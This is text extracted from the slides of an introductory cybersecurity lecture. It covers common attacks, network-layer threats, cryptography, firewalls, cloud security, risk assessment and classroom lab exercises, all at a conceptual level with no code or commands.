Fundamentals of Cyber

security
1

LECTURER:
M R . I L R S H A A D G O O L A M A L LY
IT PERSONALITY OF THE YEAR 2014
DIRECTOR
K E E P M O V I N G C O LT D
What is Cyberspace?
2
 The Cyberspace
3

Cyberspace refers to the virtual computer

world, and more specifically, is an electronic
medium used to form a global computer
network to facilitate online communication. It is
a large computer network made up of many
worldwide computer networks that employ
TCP/IP protocol to aid in communication and
data exchange activities.

Cyberspace's core feature is an interactive and

virtual environment for a broad range of
participants.
 Cyber Security
4

Cybersecurity is the practice of protecting

systems, networks, and programs from digital
attacks.

These cyberattacks are usually aimed at

accessing, changing, or destroying sensitive
information; extorting money from users; or
interrupting normal business processes.
 Importance of Cyber Security
5

In today’s connected world, everyone benefits from

advanced cyberdefense programs. At an individual
level, a cybersecurity attack can result in
everything from identity theft, to extortion
attempts, to the loss of important data like family
photos.
Everyone relies on critical infrastructure like
power plants, hospitals, and financial service
companies. Securing these and other organizations
is essential to keeping our society functioning.
 Most common Cyber attacks
6

Ransomwa
Phishing Malware
re

Social
Password
engineerin DDoS
attack
g
 Phishing
7

Phishing is the practice of sending fraudulent

communications that appear to come from a
reputable source, usually through email. The
goal is to steal sensitive data like credit card
and login information or to install malware on
the victim’s machine. Phishing is an
increasingly common cyberthreat.
Working principle of Phishing attack
8
 Ransomware
9

Ransomware is a type of malicious software.

It is designed to extort money by blocking
access to files or the computer system until
the ransom is paid. Paying the ransom does
not guarantee that the files will be recovered
or the system restored.
Working principle of Ransomware
10
 Malware
11

 Malware is a term used to describe malicious

software, including spyware, ransomware, viruses,
and worms. Malware breaches typically when a user
clicks a dangerous link or email attachment that then
installs risky software. Once inside the system,
malware can do the following:
 Blocks access to key components of the network (ransomware)
 Installs malware or additional harmful software
 Covertly obtains information by transmitting data from the hard
drive (spyware)
 Disrupts certain components and renders the system inoperable
Working principle Malware
12
 Password Attack
13

Obtaining passwords is a common and

effective attack approach. Access to a
person’s password can be obtained by looking
around the person’s desk, ‘‘sniffing’’ the
connection to the network to acquire
unencrypted passwords, using social
engineering, gaining access to a password
database or outright guessing.
 How does Password Attacks work
14

Brute force attack: This attack tries to guess every

combination in the book until it hits on yours. The attacker
automates software to try as many combinations as possible
in as quick a time as possible, and there has been some
unfortunate headway in the evolution of that tech.
Dictionary attack: This attack is exactly what it
sounds like — the hacker is essentially attacking you with a
dictionary. Whereas a brute force attack tries every
combination of symbols, numbers, and letters, a dictionary
attack tries a prearranged list of words such as you’d find in
a dictionary.
 Tips for creating a strong password
15

 Make your password long.

 Make your password a nonsense phrase.
 Include numbers, symbols, and uppercase and
lowercase letters.
 Avoid using obvious personal information.
 Do not reuse passwords.
 Change your passwords regularly.
Activity 3: How to create a strong
password
16
 DDoS: distributed denial-of-service
17

A distributed denial-of-service (DDoS) attack

is a malicious attempt to disrupt normal
traffic of a targeted server, service or
network by overwhelming the target or its
surrounding infrastructure with a flood of
Internet traffic. DDoS attacks achieve
effectiveness by utilizing multiple
compromised computer systems as sources of
attack traffic. Exploited machines can include
computers and other networked resources
 DDoS
18

From a high level, a DDoS attack is like a

traffic jam clogging up with highway,
preventing regular traffic from arriving at its
desired destination.
Scenario: A hospital website being attacked
by DDoS
19
 Social engineering
20

Social engineering is a tactic that adversaries

use to trick you into revealing sensitive
information. They can solicit a monetary
payment or gain access to your confidential
data. Social engineering can be combined
with any of the threats listed above to make
you more likely to click on links, download
malware, or trust a malicious source.
Scenario: Social Engineering Attack
21
 The Saudi Crown prince controversy
22

 In 2018 the Smartphone of Amazon CEO Jeff Bezos

was hacked through malicious message which
came from Saudi Crown Prince Ahmad Bin Salman.
 This analysis found it “highly probable” that the
intrusion into the phone was triggered by an
infected video file sent from the account of the
Saudi heir to Bezos, the owner of the Washington
Post.
 Large amounts of data were exfiltrated from
Bezos’s phone within hours.
 Physical security risks/threats
23

 A physical threat is a potential cause of an incident

that may result in loss or physical damage to the
computer systems.
 Internal: The threats include fire, unstable power
supply, humidity in the rooms housing the hardware, etc.
 External: These threats include Lightning, floods,
earthquakes, etc.
 Human: These threats include theft, vandalism of the
infrastructure and/or hardware, disruption, accidental or
intentional errors.
 Cyber Security statistics
24

43% of cyber attacks target small business

 In 2018 hackers stole half a billion personal records
Over 75% of healthcare industry has been infected
with malware over last year
Large-scale DDoS attacks increase in size by 500%
Approximately $6 trillion is expected to be spent
globally on cybersecurity by 2021
95% of cybersecurity breaches are due to human
error
 Cyber Security statistics
25

 More than 77% of organizations do not have a Cyber

Security Incident Response plan
 62% of businesses experienced phishing and social
engineering attacks in 2018.
 52% of breaches featured hacking, 28% involved
malware and 32–33% included phishing or social
engineering, respectively.
 China is responsible for the highest share of coordinated
attacks, accounting for 21%, followed by the United States
(11%), Brazil (7%), and the Russian Federation (6%).
 Part-II
26

N E T W O R K S E C U R I T Y F U N D A M E N TA L S
 Why Security?
27

Security threats are real…

• And need protection against
• Fundamental aspects of information must be
protected
 We can’t keep ourselves isolated from the
Internet
 Types of Security
28

Computer Security
 generic name for the collection of tools designed to
 protect data and to thwart hackers

Network Security
 measures to protect data during their transmission
Internet Security
 measures to protect data during their transmission
 over a collection of interconnected networks
 Goals of Security
29

Confidentialit
Integrity Availability
y
Safeguards the Authorized users
Prevents accuracy and have a reliable
unauthorized use or completeness of and timely access
disclosure of information to information
information
Basic ISP Infrastructure
30
 Access Control
31

Access control - ability to permit or deny the

use of an object by a subject.
It provides 3 essential services:
 - Identification and authentication (who can login)
 - Authorization (what authorized users can do)
 - Accountability (identifies what a user did)
 AAA
32

Authentication
Authorization
Accountability
 Authentication
33

Validating a claimed identity of an end user

or a device such as host, server, switch,
router, etc.
We must be careful to understand whether a
technology is using user, device or
application authentication.
 Authorization
34

The act of granting access rights to a user,

groups of users, system, or program.
 Typically this is done in conjunction with
authentication.
 Indentifying the attack sources
35

Active vs. passive

 Active = Writing data to the network Common to

disguise one’s address and conceal the identity of the

traffic sender –
Passive = Reading data on the network
 Purpose = breach of confidentiality
 Attackers gain control of a host in the communication
path between two victim machines
 Attackers has compromised the routing infrastructure to
arrange the traffic pass through a compromised machine
 What are network security aims?
36

Controlling data / network access

Preventing intrusions
Responding to incidences
Ensuring network availability
Protecting information in transit
 Network security services
37

Authentication
Authorisation
Access control
Data integrity
Data confidentiality
Auditing / logging
DoS mitigation
TCP/IP Layers
38
Attacks on Different Layers
39
 Layer 2 Attacks
40

ARP Spoofing
MAC attacks
DHCP attacks
VLAN hopping
 ARP Spoofing
41

ARP spoofing is a type of attack in which a

malicious actor sends falsified ARP (Address
Resolution Protocol) messages over a local
area network.
 This results in the linking of an attacker's MAC
address with the IP address of a legitimate computer
or server on the network.
 MAC Flooding
42

Exploits the limitation of all switches – fixed

CAM table size
 CAM = Content Addressable memory = stores info on
the mapping of individual MAC addresses to physical
ports on the switch.
 VLAN Hopping
43

Attack on a network with multiple VLANs

Two primary methods: -
 Switch spoofing – attacker initiates a trunking switch
 Double tagging – packet is tagged twice.
 DHCP Attacks
44

DHCP Starvation Attack

 Broadcasting vast number of DHCP requests with

spoofed MAC address simultaneously.

 DoS attack using DHCP leases

Rogue DHCP Server Attacks

 Layer 3 Attacks
45

ICMP Ping Flood

ICMP Smurf
Ping of death
 Ping Flooding
46

 A ping flood is a simple denial-of-service attack

where the attacker overwhelms the victim with
ICMP "echo request" (ping) packets.
 Ping works by sending an Internet Control Message Protocol
(ICMP) Echo Request to a specified interface on the network
and waiting for a reply. ...
 TCP Attacks
47

SYN Flood – occurs when an attacker sends

SYN requests in succession to a target.
Causes a host to retain enough state for
bogus half-connections such that there are no
resources left to establish new legitimate
connections.
 TCP Attacks
48

Exploits the 3-way handshake

Attacker sends a series of SYN packets
without replying with the ACK packet
Finite queue size for incomplete connections
 Routing Attacks
49

Attempt to poison the routing information

Distance Vector Routing
 Announce 0 distance to all other nodes
 Blackhole traffic
 Eavesdrop
Link State Routing - Can drop links randomly
 Can claim direct link to any other routers
 A bit harder to attack than DV

BGP attacks
 ASes can announce arbitrary prefix
 ASes can alter path
 Application Layer Attacks
50

Scripting vulnerabilities
Cookie poisoning
Buffer overflow
Hidden field manipulation
Parameter tampering
Cross-site scripting
SQL injection
 Server Side Scripting
51

Server-side scripting - program is executed

on the server and not on the user’s browser
or plugin.
 ASP.NET, PHP, mod_perl, CGI, Ruby, Python
 Benefits: -
 Cross-platform
 No plugin required on user side

 Disadvantages: -
 Dynamic scripts create new security concern, exploiting
code flaws
 Cross-Site Scripting
52

Cross-site scripting or XSS – enables

attackers to inject scripts into webpages
viewed by other users.
Persistent XSS – more devastating
Non-persistent XSS – more common
Ex: BeEF (Browser Exploitation Framework)
 SQL Injection
53

SQL Injection – a subset of unverified user

input vulnerability that injects malicious code
(or SQL query) into strings. This code is
executed when passed on to the SQL server.
 DNS Cache Poisoning
54

Caching incorrect resource record that did

not originate from authoritative DNS sources.
Result: connection (web, email, network) is
redirected to another target (controlled by
the attacker)
DNS Cache Poisoning
55
 Wireless Attacks
56

WEP – first security mechanism for 802.11

wireless networks
Weaknesses in this protocol were discovered
by Fluhrer, Mantin and Shamir, whose attacks
became known as “FMS attacks”
Tools were developed to automate WEP
cracking
Chopping attack were released to crack WEP
more effectively and faster
 Man in the Middle Attacks (Wireless)
57

Creates a fake access point and have clients

authenticate to it instead of a legitimate one.
Capture traffic to see usernames, passwords,
etc that are sent in clear text.
Refer to the video example provided in the lbd sessions
 Part-III
58

HOW DO WE PROTECT OUR SYSTEM?

Cryptography- what is Cryptography?
59

Part of a field of study known as cryptology

Cryptology includes: -
 Cryptography
 Study of methods for secret writing
 Transforming messages into unintelligible form
Recovering messages using some secret knowledge (key)
–
 Cryptanalysis:
 Analysis of cryptographic systems, inputs and outputs

To derive confidential information

 Cryptography
60

Encryption – process of transforming plaintext to

ciphertext using a cryptographic key
Symmetric key cryptography – uses a single key to
both encrypt and decrypt information. Also known
as private key.
 Includes DES, 3DES, AES, IDEA, RC5, Blowfish
Asymmetric key cryptography – separate keys for
encryption and decryption (public and private key
pairs)
 Includes RSA, Diffie-Hellman, El Gamal
 Terminology of cryptography
61
 Cipher
 Cryptographic technique (algorithm) applying a secret transformation to
messages
 Plaintext / cleartext
 Original message or data
 Encryption
 Transforming plaintext, using a secret key, so meaning is concealed
 Ciphertext
 Unintelligible encrypted plaintext
 Decryption
 Transforming ciphertext back into original plaintext
 Cryptographic Key
 Secret knowledge used by cipher to encrypt or decrypt message
Hoe does it work?
62
 Hash Functions
63

A hash function takes an input message of

arbitrary length and outputs fixed-length
code. The fixed-length output is called the
hash, or the message digest, of the original
input message.
 Common Algorithms: MD-5 (128), SHA-1 (160)
 Hashing
64

Also called a digest or checksum

A form of signature that represents the data.
Uses: -
 Verifying file integrity
 if the hash changes, it means the data is either
compromised or altered in transit.
 Digitally signing documents - Hashing passwords
 Trusted Network
65

A trusted network is a network of devices that are connected

to each other, open only to authorized users, and allows for
only secure data to be transmitted.
Standard defensive-oriented technologies
 Firewall
 Intrusion Detection

Build TRUST on top of the TCP/IP

infrastructure
 Strong authentication
 Public Key Infrastructure (PKI)
 Firewall
66

A firewall is a system designed to prevent

unauthorized access to or from a private
network.
You can implement a firewall in either
hardware or software form, or a combination
of both.
Firewalls prevent unauthorized internet users
from accessing private networks connected to
the internet, especially intranets.
 Firewall
67

The firewall monitors all this information

traffic to allow ‘good data’ in, but block ‘bad
data’ from entering your computer.
 Strong Authentication
68

 An absolute requirement
 Two-factor authentication
 Passwords (something you know)
 Tokens (something you have)
 Examples: -
 Passwords
 Tokens
 Tickets
 Restricted access

 PINs

 Biometrics
 Certificates
 Public Key Infrastructure
69

Framework that builds the network of trust

Combines public key cryptography, digital
signatures, to ensure confidentiality, integrity,
authentication, nonrepudiation, and access
control
Protects applications that require high level
of security
 70

Certificate Authority (CA) – a trusted third

party –
 Trusted by both the owner of the certificate and the
party relying upon the certificate
Registration Authority (RA) – binds keys to
users –
 Users who wish to have their own certificate registers
with the RA
Validation Authority (VA) – validates the user
is who he says he is
 Antivirus software
71

Antivirus software, or anti-virus software, also

known as anti-malware, is a computer program
used to prevent,
They also scan our netwroks for behaviors that
may signal the presence of a new, unknown
malware. detect, and remove malware.
Antivirus programs depend on stored virus
signatures -- unique strings of data that are
characteristic of known malware.
 Part-IV
72

CLOUD SECURITY
 What do we mean by the cloud?
73

It depends who you ask but someone will

mention:
 Infrastructure as a Service (IaaS)
 Platform as a Service (PaaS)
 Software as a Service (SaaS)
A website is not generally “the cloud”
unless it has some form of personalised
service
The cloud
74
 Infrastructure as a Service
75

You could buy these as single items in the

non- cloud world:
 Firewalls
 Servers
 Storage
By themselves, they won’t do much useful
work, they need to be used in combination
and have software added
 Cloud Security
76

Cloud security is the protection of data,

applications, and infrastructures involved in
cloud computing.
Like any computing environment, cloud
security involves maintaining adequate
preventative protections so you:
 Know that the data and systems are safe.
How to maintain security of our data in cloud
77

Password Protection
Remote Access
Encrypted Data
Network Security
Backup Data
 Part-V
78

RISK ASSESSMENT
&
RESPONSE POLICY
 Risk management vs. cost of security
79

Risk mitigation –
 The process of selecting appropriate controls to reduce

risk to an acceptable level

The level of acceptable risk
 Determined by comparing the risk of security hole
exposure to the cost of implementing and enforcing the
security policy
Assess the cost
 of certain losses and do not spend more to protect

something than it is actually worth

 What is Risk Assessment
80

The goal of the risk assessment process is to

apply a consistent methodology for assessing
the ICT risks faced by the organisation. It
provides the foundation for effective risk
management and makes sure significant ICT
risks and their potential business impacts are
identified and assessed in a timely manner.
 Risk assessment elements
81

The risk assessment process covers 3 key

activities:
risk identification
risk analysis
risk evaluation
 Risk identification
82
 Once we have established the context for the risk assessment, the
next step is to identify the ICT risks that threaten the achievement
of our business objectives or that create an opportunity to exceed
them. There are numerous risk identification techniques we can use:
 One-to-one interviews
 Group discussions / facilitated workshops
 Questionnaires / surveys
 Strengths, weaknesses, opportunities, threats (SWOT) analysis
 Dependency modelling
 External environment / horizon scanning
 Scenario analysis
 Process mapping
 Breakdown of a risk
83
 Event: A risk event is defined as something that could prevent the
achievement of an objective, milestone or target, or something that could
create an opportunity to exceed any of these things.

 Causes: The event may occur as a result of a number of causes that may
be internal or external. Identifying the causes of a risk event will help us
to better understand the risk and the interrelationships between
different risks.

 Consequences: The consequences describe the outcomes of the risk

event, if it were to occur. These may include service interruption, or
impacts on safety, costs, reputation and/or regulations. Understanding
the consequences of risks allows us to make sure you have appropriate
strategies for risk mitigation and/or recovery.
 Risk Analysis
84

1. Assess the likelihood and impact of the risk

occurring in the absence of mitigating
controls. This is referred to as the inherent
risk rating and should be based on normal
circumstances, that is, the most probable
case as opposed to the worst-case scenario.
 85

2. Identify and assess the effectiveness of the

existing controls that are in place to mitigate
the risk. Assessing control effectiveness
accurately is important for making an
accurate assessment of residual risk.
 86

 Assess the residual risk rating based on the

effectiveness of the mitigating controls. As a
rule, controls reduce the likelihood of the risk
occurring. Some controls, however, reduce
the impact of the risk once it has occurred –
for example, a business continuity plan may
reduce the impact of a natural disaster but
not the likelihood of it occurring.
 Risk evaluation
87

The final step in the risk assessment process

is to evaluate whether the residual risk rating
is acceptable or unacceptable. This is based
on an assessment of the target risk rating.
 Developing a disaster recovery plan
88

Businesses should develop an IT disaster

recovery plan. It begins by compiling an
inventory of hardware (e.g. servers, desktops,
laptops and wireless devices), software
applications and data. The plan should include a
strategy to ensure that all critical information is
backed up.
Development of data backup plan and ensuring
availability of inventory to keep business running
are the main factors.
Part-VI
89

LAB SESSIONS
 Activity 1
90

Give examples of devices that form the

cyberspace.
 Lab-1
91

Give some examples of, why we need to secure our part of

the cyberspace?
 Lab-2
92

As an activity: goto

https://howsecureismypassword.net/
Try some dummy password and see how
strong is your password. Be creative, think
out of the box
 Lab-3
93

https://youtu.be/jV0Q_muo1wI

Watch the video and discuss ways to save the

reputation and its customers of any business
from scammers.
 Lab-4
94
Ebony Coats limited is medium sized law firm in Mauritius and
they have a computer network comprising of 25 nodes.
Currently this Organization comprises in small building with no
dedicated IT room neither departments.
An obsolete Antivirus system is poorly implemented. There is Domain
but with no effective group policy.
There are few Security camera which are faulty too.
Reports of Equipment theft within the organization are increasing
day by day.
Employees are not well trained with using Internet and other IT
Systems.
The Network is poorly managed.

Brainstorm a possible physical and network security plan, give

suggestions.
 Lab-5
95

Your class has been assigned to carry out risk

assessment for a small business in port
Louise.
SCENARIO: An employee within your organization used the
company’s digital camera for business purposes. In the course of
doing so, they took a scenic photograph that they then loaded onto
their personal computer by inserting the SD card. The SD card
was infected with malware while connected to the employee’s
personal computer. When re-inserted into a company machine, it
infected the organization’s system with the same malware.
Discussion questions
Who within the organization would you need to notify?
How would your organization identify and respond to malware infecting
your system through this vector?
What is the process for identifying the infection vector?
What other devices could present similar threats?
What should management do?
How can you prevent this from occurring again?
Does your organization have training and policies in place to prevent
this?
Do policies apply to all storage devices?

96